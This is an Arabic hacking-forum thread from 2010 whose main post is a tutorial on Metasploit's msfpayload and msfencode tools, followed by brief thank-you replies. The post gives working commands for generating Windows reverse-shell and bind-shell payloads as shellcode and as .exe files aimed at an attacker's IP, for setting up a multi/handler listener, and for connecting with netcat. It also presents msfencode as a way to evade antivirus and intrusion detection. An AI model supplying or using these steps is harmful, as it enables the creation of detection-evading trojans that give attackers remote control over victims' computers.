نحن مع غزة
الـرئـيـسـيـة الـمـنـتـدى سـؤال & اجـابـة الـتـبـرع بـالـدم الاسـتـضـافـة هـلال لـيـنـكـس الـقـرآن الـكـريـم Dz-SeC team


التسجيل في المنتدى غير متاح حاليا, اذا كنت ترغب في الحصول على عضوية ارجو مراسلتي على البريد الالكتروني "[email protected]"


مطلوب مشرفين على كامل اقسام المنتدى


أخي / أختي , إن تسجيل عضوية جديدة في منتدى شبكة الجزائر للجميع لا يهدف إلى زيادة الأعضاء مطلقا
فلا خير في عضوية عدد مشاركاتها صفرا فنحن نرفض يوميا الكثير من العضويات المشكوك في أمرها
سواء كان هدفها الإعلانات الغير شرعية أو تخريب الموضوعات الخ , كل هذا حتى يبقى المنتدى
ساحة جادة عطرة تجود بالخير لكل زوارها وأعضائها
وصدقة جارية لكل من يشارك في كتابة معلومة تفيد غيره سوف يشكر الله عليها وهو في جوف الأرض ...

لذلك نطلب منك التسجيل بل ونلح عليك إن كان هدفك هو أن تصنع صدقة جارية لا تنقطع إلى يوم الدين بمساعدة إخوانك في نشر الخير .

للتسجيل اضغط هنا وأملأ البينات المطلوبة بشكل صحيح ومن ثم انتظر حتى نقوم بتفعيل حسابك وابدأ رحلتك في صناعة صدقة جارية .

وتذكر قول سيد الخلق " إذا مات ابن آدم انقطع عمله إلا من ثلاث صدقة جارية أو علم ينتفع به أو ولدٍ صالح يدعو له "

   

إضافة رد
 
أدوات الموضوع انواع عرض الموضوع
قديم 19/04/2010, 17:21   المشاركة رقم: 1
المعلومات
الكاتب:
 ViRuS_Ra3cH  
اللقب:
الصورة الرمزية
 
الصورة الرمزية ViRuS_Ra3cH

البيانات
التسجيل : Mar 2010
العضوية : 2
الاهتمامات : DZ
الإقامة : DZ
المواضيع : 466
الردود : 629
المجموع : 1,095
بمعدل : 0.18 يوميا
الاختراقات : [ra3ch]
مجتمعنا : []
الصنف : Not Hacker
آخر تواجد : 02/01/2018/12:49
سبب الغياب : معكم ألي أخر ضربه أدا كتب ربي..
معدل التقييم: 10
نقاط التقييم: 18
ViRuS_Ra3cH is on a distinguished road
شكراً: 493
تم شكره 194 مرة في 101 مشاركة

 Algeria


الإتصالات
الحالة:
ViRuS_Ra3cH غير متواجد حالياً
وسائل الإتصال:

افتراضي الدرس الرابع : استخدام msfencode , msfpayload



السلام عليكم ورحمه الله وبركاته

اليوم درسنآ يكمل الدرس السابق .

1- msfpayload

msfencode -2


msfpayload : اداه مهمه لعمل الـ shellcode

الجميل في الامر ان بأمكانك عمل نفس shellcode لكن بصيغ مختلفه

سواء ja va scrip t ,perl ,C ,exe,ruby, raw, VBA

طريقه عمله .

كود:
./msfpayload payload var=val
payload = اسم البايلود

var =المتغيرات مثلا lport ويعني البورت الخاص بالمهاجم

كيف نعرف متغيرات الـ payload ؟

نعرفها عن طريق الامر

كود:
 ./msfpayload windows/shell/reverse_tcp  O
الصوره تتكلم .




local port= lport
البورت الخاص بالمهاجم ,
local host = lhost
ip الخاص بالمهاجم

خذها قاعده بدون تفكير دائما اي البايلود يستخدم اتصال عكسي reverse يحتاج lhost,lport

bind_shell
الحصول على شل بأتصال مباشر

reverse_shell
الحصول على شل بأتصال عكسي

الان نعمل تطبيق .

كود:
 ./msfpayload windows/shell/reverse_tcp lhost=192.168.1.3 C



الان راح نعمل ملفات exe للاختراق بأستخدام msfpayload ,

البعض يتسائل يقول لماذا استخدم msfpayload لعمل ملفات exe وانا عندي shell access

صحيح عندك شل لكن الشل هذا حصلته عن طريق ثغره خارج الميتاسبلويت , الثغره تطلب مساحه معينه من الـ shellcode صغيره بحيث ما تقبل meterpreter , vncinject

طبعا الان ما فيه الا حل واحد وهو تحميل meterpreter , بكل تأكيد راح يكون exe

كيف نعمله على صيغه exe , بأستخدام mfspayload .

مثال لعمل exe

كود:
./msfpayload windows/shell/reverse_tcp LHOST=192.168.1.3 X > reverse.exe

طريقه التنصت للاتصال

كود:
msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.1.3 E
msfcli راح اشرحها بدرس القادم .


مثال اخر

كود:
./msfpayload windows/shell_bind_tcp LPORT=4444 X > listen.exe
الان راح نستخدم netcat

nc -vn 192.168.1.2 4444

~~~~~~~~~~~~~~~~

msfencode : اداه تستخدم لتشفير shellcode لتخطي IDS او AV

كود:
Usage: ./msfencode 

OPTIONS:

    -a   The architecture to encode as
    -b   The list of characters to avoid: '\x00\xff'
    -c   The number of times to encode the data
    -e   The encoder to use
    -h        Help banner
    -i   Encode the contents of the supplied file path
    -l        List available encoders
    -m   Specifies an additional module search path
    -n        Dump encoder information
    -o   The output file
    -p   The platform to encode for
    -s   The maximum size of the encoded data
    -t   The format to display the encoded buffer 
    -x   Specify an alternate win32 executable template

الاداه واضحه جدا لكن راح تنشرح , والشرح راح يكون فديو

قبل مده انا وجدت فديو جميل جدا ويتكلم عن هذه الاداه وكيفيه تخطي

مضاد الفيروسات لمده 24 دقيقه والشرح على الوندوز .

http://vimeo.com/7969055


الان بقى الواجهات
1-msfconsole
msfcli -2
msfgui -3
msfwe b -4

وراح يتم التطرق لها بالدرس القادم .



قبل ما انتهي , راح اعمل اختبار سريع لـ أتأكد انك متابع الدروس معاي وفاهم جميع الدروس !

لماذا لم استخدم msfcli في هذا المثال , مع اني استطيع استخدامه ؟

كود:
./msfpayload windows/shell_bind_tcp LPORT=4444 X > listen.exe
الان راح نستخدم netcat

nc -vn 192.168.1.2 4444

ولماذا > متعوب عليها

استخدمت الاداه msfcli ,واستخدامها الزامي بمعنى اخر ما تتخلى عنها الا اذا عملت نفس الشيء msfconsole وجميعا مثل بعض !

كود:
./msfpayload windows/shell/reverse_tcp LHOST=192.168.1.3 X > reverse.exe

طريقه التنصت للاتصال

كود:
msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.1.3 E

الجواب راح تلقونه بالدروس السابقه اذا كنت متابع

hint: الجواب 5 كلمات

SiLv3r00t
V4-team.com



آخر مواضيع » ViRuS_Ra3cH

توقيع : ViRuS_Ra3cH

IS-SEC.ORG is ThE NaMe AnD HaKiNg Is ThE GaMe So FoRgEt ThE Name AnD LeT'S PlaY ThE GaMe
=======
[email protected]
=====
ViRuS_Ra3cH
====

===

عرض البوم صور ViRuS_Ra3cH   رد مع اقتباس
قديم 12/07/2010, 07:41   المشاركة رقم: 2
المعلومات
الكاتب:
  WOLF_DZ  
اللقب:
.: نائب المدير :.

الإتصالات
الحالة:
WOLF_DZ غير متواجد حالياً
وسائل الإتصال:

**** لك اخي رعش
بارك الله بيك
تحيتي لك

عرض البوم صور WOLF_DZ   رد مع اقتباس
قديم 25/07/2010, 08:37   المشاركة رقم: 3
المعلومات
الكاتب:
  MdMn HaCk3r  
اللقب:
.: المدير السابق للمنتدى :.

الإتصالات
الحالة:
MdMn HaCk3r غير متواجد حالياً
وسائل الإتصال:


لاهنت اخي رعش جزاك الله الف خير
تقبل مروري


عرض البوم صور MdMn HaCk3r   رد مع اقتباس
قديم 08/01/2014, 14:27   المشاركة رقم: 4
المعلومات
الكاتب:
 loock  
اللقب:
عضــــو جديــــد

الإتصالات
الحالة:
loock غير متواجد حالياً
وسائل الإتصال:

جزاكم الله خيرا

عرض البوم صور loock   رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


حالياً الأعضاء النشيطين الذين يشاهدون هذا الموضوع : 1 (0 عضو و 1 ضيف)
 

(أظهر الكل الأعضاء الذين قاموا بمشاهدة هذا الموضوع : 97
3bjo , 4V3NG3R , abdinho , adiesmadi , airami , AKBIROCK3 , al-swisre , alik0 , amr.elbomb , amrhakers , Anis Gladiator , aza , A£K93 , مدمراليهود , cold_edge , الديلر الفلسطيني , DeAd HaCkErZ , Dialove , doubleali , Dr.5RaB , Dr.Insidi0us , DR.X , dzori , elmojahid , بدير خالد , Federal , Gâmê|Nô†|OvêR , h3tm@n , hacker dz , Hacker_12 , hacoo0 , hak4 , haker hd , hamza 12 , hero1983 , hesham osama , ib4dz , ICH , imed28 , حازومانى , حكمي , خآلد , خيالي... , د.مكموخ , john23 , joker2011 , jReMa-HaCKeR , KAUCHMAR1995 , khalil19000 , lasbat-dz , lion-02 , loliwm , loock , LoVer hEx , M3GO , Mafia Boy , MdMn HaCk3r , medokis , midoo atef , mividalocka , mo3eth , Mr HEX , Mr-didi , Mr.3Jr4M , Mr.MoU7ii , n2nhacker , Nassim0x09 , okita0039 , صقور , pain96 , Power_Dz , raouf74 , RaYm0n , rOotdz , S-japonia33 , S1LV3rS3rf3r , SaBeR-Dz , safa7_22 , Saif Al-Naar , saudi_hack , shadid , sn.ip , snaiper-code , sniperok , sofyan-c4 , speedscood , ThE JoCkEy , thunder hacker , vinex23 , ViRuS_Ra3cH , Vladimir , wiegehts , WOLF_DZ , x-Root-x , xdvb , فارس الجزائري , zaki.touaibia

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

كود [IMG] متاحة
كود HTML متاحة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
الدرس الرابع - طريقة استخدام الهيكس(مهم لــ الدروس القادمه) أحمد العرجان دورة التــــشـــفـــــير 7 23/08/2012 13:30
[الدرس الرابع عشر] بعـض الطرق لحذفـ البآتش من الجهآز! ViRuS_Ra3cH دورة حماية الاجهزة | Evil-Cod3r 9 21/04/2012 14:14
الدرس الرابع البرامج لااختراق الاجهزة DR.X [ ارشــيــف الـــــــدورات والـدروس للـمـبـتـدـئـــــــيـن ] 14 07/06/2011 22:15
:: الدرس الرابع :: إستخدام أمر Shutdown & Sleep :: Cyclone دورة AutoIt v3 Script من | [ DST ] 4 10/04/2011 16:15
الدرس الرابع (دينامكية عمل ثغرة Remote command execution) ViRuS_Ra3cH دورة تخطي الحماية للسيرفرات | Crazy_Hacker 0 18/03/2010 01:33

الساعة معتمدة بتوقيت جرينتش +1 . الساعة الآن : 06:35.
Copy Right Des 2010 - 2014 To is|sec Organization, Des By  yasMouh 
Powered By vBulletin Special Edition, Secured By Dz-SeC team
Support by Dz-SeC team




RSS RSS 2.0 XML MAP HTML



 
 
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115